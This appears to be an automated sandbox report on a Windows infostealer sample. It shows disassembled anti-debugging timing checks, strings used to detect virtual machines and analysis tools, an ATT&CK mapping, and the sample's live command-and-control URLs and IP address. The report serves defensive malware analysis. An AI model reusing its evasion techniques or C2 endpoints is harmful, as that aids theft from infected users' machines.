Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0CAC second address: 6EE0CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007FE100E1706Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0CC2 second address: 6EE0CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov bx, 5524h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE1010EA796h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0D22 second address: 6EE0D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 mov edi, eax 0x0000000a jmp 00007FE100E17073h 0x0000000f test edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE100E1706Bh 0x0000001a sub cx, 415Eh 0x0000001f jmp 00007FE100E17079h 0x00000024 popfd 0x00000025 call 00007FE100E17070h 0x0000002a pop ecx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0D81 second address: 6EE0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0D87 second address: 6EE0D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0D8B second address: 6EE0E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FE1711A90A4h 0x00000011 pushad 0x00000012 mov esi, 52BAB35Dh 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FE1010EA798h 0x0000001e adc ecx, 1054CEE8h 0x00000024 jmp 00007FE1010EA78Bh 0x00000029 popfd 0x0000002a mov eax, 163016DFh 0x0000002f popad 0x00000030 popad 0x00000031 mov eax, dword ptr [ebp-04h] 0x00000034 jmp 00007FE1010EA792h 0x00000039 mov dword ptr [esi+08h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FE1010EA78Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0E00 second address: 6EE0E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0E06 second address: 6EE0EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov esi, 6FBF07AFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebx+70h] 0x00000011 pushad 0x00000012 mov esi, 3F823DA7h 0x00000017 pushfd 0x00000018 jmp 00007FE1010EA78Ch 0x0000001d or esi, 029F46D8h 0x00000023 jmp 00007FE1010EA78Bh 0x00000028 popfd 0x00000029 popad 0x0000002a push 00000001h 0x0000002c pushad 0x0000002d jmp 00007FE1010EA794h 0x00000032 mov ch, 95h 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007FE1010EA78Ah 0x0000003b mov dword ptr [esp], eax 0x0000003e jmp 00007FE1010EA790h 0x00000043 lea eax, dword ptr [ebp-18h] 0x00000046 pushad 0x00000047 mov edi, eax 0x00000049 pushfd 0x0000004a jmp 00007FE1010EA78Ah 0x0000004f jmp 00007FE1010EA795h 0x00000054 popfd 0x00000055 popad 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a mov eax, edx 0x0000005c mov esi, edi 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0EA6 second address: 6EE0EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0EAC second address: 6EE0EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0EB0 second address: 6EE0ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE100E17074h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0F26 second address: 6EE0F5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FE1010EA78Eh 0x00000010 js 00007FE1711A8EE2h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0F5F second address: 6EE0F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0F63 second address: 6EE0F69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0F69 second address: 6EE0F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007FE100E17070h 0x00000011 mov ecx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0F9C second address: 6EE0FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0FA0 second address: 6EE0FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0FA4 second address: 6EE0FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0FAA second address: 6EE0FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007FE100E17070h 0x00000011 mov edx, 770206ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE100E1706Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0FE8 second address: 6EE0FF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0FF7 second address: 6EE104F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007FE100E1706Bh 0x0000000c add esi, 4E49B16Eh 0x00000012 jmp 00007FE100E17079h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b sub eax, eax 0x0000001d jmp 00007FE100E17077h 0x00000022 lock cmpxchg dword ptr [edx], ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE104F second address: 6EE1053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE1053 second address: 6EE1059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE1059 second address: 6EE105E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE105E second address: 6EE1079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, ch 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov cl, bh 0x0000000d mov ecx, 6DF38EBFh 0x00000012 popad 0x00000013 test eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE1079 second address: 6EE107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE107D second address: 6EE1083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE1083 second address: 6EE1089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE1089 second address: 6EE108D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE108D second address: 6EE10B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FE1711A8DCDh 0x0000000e jmp 00007FE1010EA78Ch 0x00000013 mov edx, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE1010EA78Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE10B8 second address: 6EE10BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE10BE second address: 6EE10D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSpecial instruction interceptor: First address: 859CBA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSpecial instruction interceptor: First address: 857276 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSpecial instruction interceptor: First address: A27DFB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSpecial instruction interceptor: First address: A8AB14 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0015255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0015255D
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001529FF
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0015255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0015255D
Source: ivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ivHDHq51Ar.exeBinary or memory string: Hyper-V RAW
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: ivHDHq51Ar.exe, 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ivHDHq51Ar.exe, 00000000.00000003.1607628699.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607601890.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1511961128.0000000001481000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1635897683.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1608081492.00000000014F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile opened: NTICE
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile opened: SICE
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeProcess queried: DebugPortJump to behavior
Source: ivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.9:49706 -> 176.53.146.223:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ivHDHq51Ar.exe43%VirustotalBrowse
ivHDHq51Ar.exe55%ReversingLabsWin32.Infostealer.Tinba
ivHDHq51Ar.exe100%AviraTR/Crypt.TPM.Gen
ivHDHq51Ar.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl0%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0000%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk173553773769630%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd40%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk170%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377370%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5vs.top
176.53.146.223
truetrue
    		unknown
    httpbin.org
    		34.200.57.114
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://html4/loose.dtdivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://httpbin.org/ipbeforeivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://curl.se/docs/http-cookies.htmlivHDHq51Ar.exe, ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWlivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://curl.se/docs/hsts.html#ivHDHq51Ar.exefalse
                  		high
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=000ivHDHq51Ar.exe, 00000000.00000002.1635378127.000000000144E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377376963ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4ivHDHq51Ar.exe, 00000000.00000002.1635584991.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607874627.0000000001496000.00000004.00000020.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000003.1607649425.0000000001496000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/alt-svc.htmlivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    http://.cssivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://.jpgivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        176.53.146.223
                        		home.fiveth5vs.topUnited Kingdom
                        		35791VANNINVENTURESGBtrue
                        34.200.57.114
                        		httpbin.orgUnited States
                        		14618AMAZON-AESUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582697
                        Start date and time:2024-12-31 09:44:11 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 21s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:ivHDHq51Ar.exe
                        renamed because original name is a hash value
                        Original Sample Name:27b03055c39daab2ce7ae0c5a369f0f1.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 4.175.87.197
